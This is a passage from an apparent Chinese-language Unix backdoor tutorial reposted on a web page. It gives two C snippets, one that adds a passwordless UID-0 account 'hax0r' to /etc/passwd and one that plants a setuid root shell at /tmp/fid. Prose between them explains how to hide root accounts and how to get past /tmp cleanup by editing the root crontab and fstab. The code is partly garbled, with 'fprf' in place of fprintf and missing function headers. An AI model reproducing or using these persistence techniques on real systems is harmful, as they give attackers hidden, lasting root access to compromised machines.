<> backdoor/backdoor1.c
#
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprf(fd,"hax0r::0:0::/root:/bin/shn");
}
<-->
比这种思路方法稍微隐蔽点就是将藏在口令文件中某个无人使用帐号 UID 改为 0并将其第 2个域(口令域)设为空(注意如果你使用是较高版本*nix也许还要修改 /etc/shadow 文件)
在 /tmp 目录下放置 suid shell以后只要你运行这个就会轻易得到根用户权限这种思路方法几乎是最受欢迎了但有许多系统每几小时或者每次启动都会清除 /tmp 目录下数据另外些系统则根本不允许运行 /tmp 目录下 suid 当然你可以自己修改或清除这些限制(你已是根用户有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)以下是在 /tmp 目录下放置 suid shell C源
<> backdoor/backdoor2.c
#
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->
最新评论